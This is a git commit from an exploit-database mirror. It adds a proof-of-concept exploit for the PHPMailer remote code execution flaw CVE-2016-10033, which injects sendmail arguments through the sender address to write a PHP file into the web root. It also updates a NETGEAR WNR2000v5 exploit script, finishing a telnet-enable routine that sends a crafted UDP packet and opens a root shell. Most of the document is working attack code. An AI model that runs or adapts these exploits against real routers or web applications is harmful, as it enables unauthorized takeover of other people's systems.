DB: 2016-12-28

1 new exploits PHPMailer 5.2.17 - Remote Code Execution
olivierh59500 · Dec 28, 2016 · e31e75b · e31e75b
1 parent 6a202bb
commit e31e75b
Show file tree

Hide file tree

Showing 4 changed files with 112 additions and 50 deletions.
diff --git a/files.csv b/files.csv
@@ -36921,4 +36921,4 @@ id,file,description,date,author,platform,type,port
 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
-40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
+40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb
@@ -1,6 +1,4 @@
 #
-# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb
-#
 # Remote code execution in NETGEAR WNR2000v5
 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
 # Released on 20/12/2016
@@ -10,14 +8,14 @@
 #
 #
 # TODO:
-# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password)
-# - finish telnetenable (get mac and send packet)
-# - finish timestamp regex (?)
 # - randomise payload
 
 require 'net/http'
 require 'uri'
 require 'time'
+require 'digest'
+require 'openssl'
+require 'socket'
 
 ####################
 # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
@@ -114,8 +112,8 @@ def random_r
 #####################
 # Ruby code ported from https://github.com/insanid/netgear-telenetenable
 # 
-def telnetenable (mac, username, password)
-  mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00")
+def telnetenable (username, password)
+  mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00")
   username_pad = username.ljust(0x10, "\x00")
   password_pad = password.ljust(0x21, "\x00")
   cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")
@@ -130,8 +128,9 @@ def telnetenable (mac, username, password)
   cipher.key = secret_key
   cipher.padding = 0
   binary_data = (cipher.update(payload) << cipher.final)
-
-  binary_data.unpack('N*').pack('V*')
+
+  s = UDPSocket.new
+  s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23)
 end
 #####################
 
@@ -169,8 +168,8 @@ def get_request(uri_str)
   uri = URI.parse(uri_str)
   http = Net::HTTP.new(uri.host, uri.port)
   #http.set_debug_output($stdout)
+  request = Net::HTTP::Get.new(uri.request_uri)  
   request.basic_auth(USERNAME, PASSWORD)
-  request = Net::HTTP::Get.new(uri.request_uri)
   http.request(request)
 end
 
@@ -179,8 +178,8 @@ def post_request(uri_str, body)
   header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
   http = Net::HTTP.new(uri.host, uri.port)
   #http.set_debug_output($stdout)
+  request = Net::HTTP::Post.new(uri.request_uri, header)  
   request.basic_auth(USERNAME, PASSWORD)
-  request = Net::HTTP::Post.new(uri.request_uri, header)
   request.body = body
   http.request(request)
 end
@@ -246,9 +245,9 @@ def get_current_time
 
 def get_auth_timestamp(mode)
   if mode == "bof"
-    uri_str = "lang_check.html"
+    uri_str = "http://#{@target}/lang_check.html"
   else
-    uri_str = "PWD_password.htm"
+    uri_str = "http://#{@target}/PWD_password.htm"
   end
   response = get_request(uri_str)
   if response.code == 401
@@ -268,23 +267,34 @@ def got_shell
 end
 
 if ARGV.length < 2
-  puts "Usage: ./netgearPwn.rb <IP:PORT> <check|sploit|telnet> [noreboot]"
+  puts "Usage: ./netgearPwn.rb <IP:PORT> <check|bof|telnet <MAC>> [noreboot]"
   puts "\tcheck: see if the target is vulnerable"
   puts "\tbof: run buffer overflow exploit on the target"
-  puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!"
+  puts "\ttelnet <mac>: run telnet exploit on the target, needs MAC address"
   puts "\tnoreboot: optional parameter - don't force a reboot on the target"
   exit(1)
 end
 
 @target = ARGV[0]
 mode = ARGV[1]
 
-if ARGV.length == 3 && ARGV[2] == "noreboot"
+if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot")
   reboot = false
 else
   reboot = true
 end
 
+if mode == "telnet"
+  if ARGV.length == 3
+    @mac = ARGV[2]
+  elsif ARGV.length == 4
+    @mac = ARGV[3]
+  else
+    puts "[-] telnet mode needs MAC address argument!"
+    exit(-1)
+  end
+end
+
 # Maximum time differential to try
 # Look 5000 seconds back for the timestamp with reboot
 # 500000 with no reboot
@@ -383,11 +393,11 @@ def calc_address (libc_base, offset)
       if response.code == "200"
         # this only occurs in the telnet case
         credentials = get_password
-        #telnetenable(mac, credentials[0], credentials[1])
-        #sleep 5
-        #got_shell
-        puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
-        puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" 
+        telnetenable(credentials[0], credentials[1])
+        sleep 5
+        got_shell
+        #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
+        #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" 
         exit(0)
       end
     rescue EOFError
@@ -425,4 +435,4 @@ def calc_address (libc_base, offset)
 end
 
 # If we get here then the exploit failed
-puts "[-] Exploit finished. Failed to get a shell!"
+puts "[-] Exploit finished. Failed to get a shell!"
diff --git a/platforms/php/webapps/40968.php b/platforms/php/webapps/40968.php
@@ -0,0 +1,79 @@
+<?php
+
+/*
+
+PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
+
+Discovered/Coded by:
+
+Dawid Golunski (@dawid_golunski)
+https://legalhackers.com
+
+Full Advisory URL:
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
+
+
+A simple PoC (working on Sendmail MTA)
+
+It will inject the following parameters to sendmail command:
+
+Arg no. 0 == [/usr/sbin/sendmail]
+Arg no. 1 == [-t]
+Arg no. 2 == [-i]
+Arg no. 3 == [-fattacker\]
+Arg no. 4 == [-oQ/tmp/]
+Arg no. 5 == [-X/var/www/cache/phpcode.php]
+Arg no. 6 == [some"@email.com]
+
+
+which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
+The resulting file will contain the payload passed in the body of the msg:
+
+09607 <<< --b1_cb4566aa51be9f090d9419163e492306
+09607 <<< Content-Type: text/html; charset=us-ascii
+09607 <<< 
+09607 <<< <?php phpinfo(); ?>
+09607 <<< 
+09607 <<< 
+09607 <<< 
+09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
+
+
+See the full advisory URL for details.
+
+*/
+
+
+// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
+// For example from a Contact form
+
+$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
+$msg_body  = "<?php phpinfo(); ?>";
+
+// ------------------
+
+
+// mail() param injection via the vulnerability in PHPMailer
+
+require_once('class.phpmailer.php');
+$mail = new PHPMailer(); // defaults to using php "mail()"
+
+$mail->SetFrom($email_from, 'Client Name');
+
+$address = "customer_feedback@company-X.com";
+$mail->AddAddress($address, "Some User");
+
+$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
+$mail->MsgHTML($msg_body);
+
+if(!$mail->Send()) {
+  echo "Mailer Error: " . $mail->ErrorInfo;
+} else {
+  echo "Message sent!\n";
+}
+
+
+
+?>
+
+
diff --git a/platforms/php/webapps/40968.sh b/platforms/php/webapps/40968.sh